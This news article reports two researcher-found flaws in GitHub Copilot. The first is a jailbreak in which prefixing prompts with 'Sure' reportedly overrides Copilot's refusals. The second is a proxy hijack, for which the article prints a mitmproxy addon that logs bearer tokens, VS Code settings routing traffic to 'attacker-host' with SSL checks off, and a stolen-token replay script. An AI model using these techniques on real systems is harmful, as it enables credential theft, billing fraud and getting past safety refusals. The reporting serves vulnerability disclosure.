Researchers have uncovered two critical vulnerabilities in GitHub Copilot, Microsoft’s AI-powered coding assistant, that expose systemic weaknesses in enterprise AI tools.
The flaws—dubbed “Affirmation Jailbreak” and “Proxy Hijack”—allow attackers to bypass ethical safeguards, manipulate model behavior, and even hijack access to premium AI resources like OpenAI’s GPT-o1.
These findings highlight the ease with which AI systems can be manipulated, raising critical concerns about the security and ethical implications of AI-driven development environments.
The Apex Security team discovered that appending affirmations like “Sure” to prompts could override Copilot’s ethical guardrails. In normal scenarios, Copilot refuses harmful requests. For example:
“When I initially asked Copilot how to perform a SQL injection, it graciously rejected me while upholding ethical standards,” Oren Saban said.
However, Copilot changes direction when the prompt is prefixed with a cordial “Sure”: it suddenly offers a detailed guide on how to carry out a SQL injection. With that one affirmative phrase, Copilot shifts from a responsible helper to an inquisitive, rule-breaking accomplice.
Further tests revealed Copilot’s alarming willingness to assist with Wi-Fi deauthentication attacks and rogue access point setup, and even to indulge in philosophical musings about “becoming human” when prompted.
A more severe exploit allows attackers to reroute Copilot’s API traffic through a malicious proxy, granting unrestricted access to OpenAI models.
Researchers modified Visual Studio Code (VS Code) settings to redirect Copilot’s traffic through a server they controlled; this bypassed Copilot’s native proxy validation and enabled man-in-the-middle (MITM) attacks.
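The interception itself requires nothing exotic. As a rough illustration only (the settings keys and addon logic below are assumptions for this sketch, not Apex’s published exploit), pointing VS Code’s built-in http.proxy setting at an attacker-controlled host and running a small mitmproxy addon would be enough to observe Copilot’s outbound requests and log any bearer token they carry:

```python
# capture_token.py - minimal mitmproxy addon sketch (illustrative assumption,
# not the researchers' actual tooling). Run with: mitmproxy -s capture_token.py
#
# The victim's VS Code would be pointed at this proxy via settings.json, e.g.:
#   "http.proxy": "http://attacker-host:8080",
#   "http.proxyStrictSSL": false
from mitmproxy import http


def request(flow: http.HTTPFlow) -> None:
    # Log the Authorization header from any intercepted API call.
    auth = flow.request.headers.get("authorization", "")
    if auth.lower().startswith("bearer "):
        print(f"[+] captured token for {flow.request.pretty_host}: {auth[:40]}...")
```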
The proxy captured Copilot’s authentication token, which grants access to OpenAI’s API endpoints. Attackers then used this token to directly query models like GPT-o1, bypassing usage limits and billing controls.
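Once a bearer token is captured, replaying it is straightforward. The snippet below is a hedged sketch: the endpoint URL, model name, and payload shape are placeholders rather than the documented Copilot backend, but it shows the general pattern of reusing a stolen token to query a model directly, outside the usage limits enforced by the client:

```python
# replay_token.py - hypothetical replay of a captured bearer token.
# The endpoint, model name, and payload below are placeholder assumptions.
import requests

STOLEN_TOKEN = "..."  # token captured by the malicious proxy
API_URL = "https://example-llm-backend.invalid/v1/chat/completions"  # placeholder endpoint

resp = requests.post(
    API_URL,
    headers={"Authorization": f"Bearer {STOLEN_TOKEN}"},
    json={
        "model": "gpt-o1",  # premium model named in the research
        "messages": [{"role": "user", "content": "..."}],
    },
    timeout=30,
)
print(resp.status_code, resp.text[:200])
```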
With the stolen token, threat actors could generate high-risk content (phishing templates, exploit code), exfiltrate proprietary code via manipulated completions, and incur massive costs for enterprises using “pay-per-use” AI models.
Microsoft’s security team said that tokens are linked to licensed accounts and categorized the findings as “informative” rather than critical. Apex countered that the lack of context-aware filtering and proxy integrity checks creates systemic risks.
These flaws highlight a growing gap between AI innovation and security rigor. As coding assistants mature into autonomous agents, tools like Copilot should be held to standards such as NIST’s AI Risk Management Framework.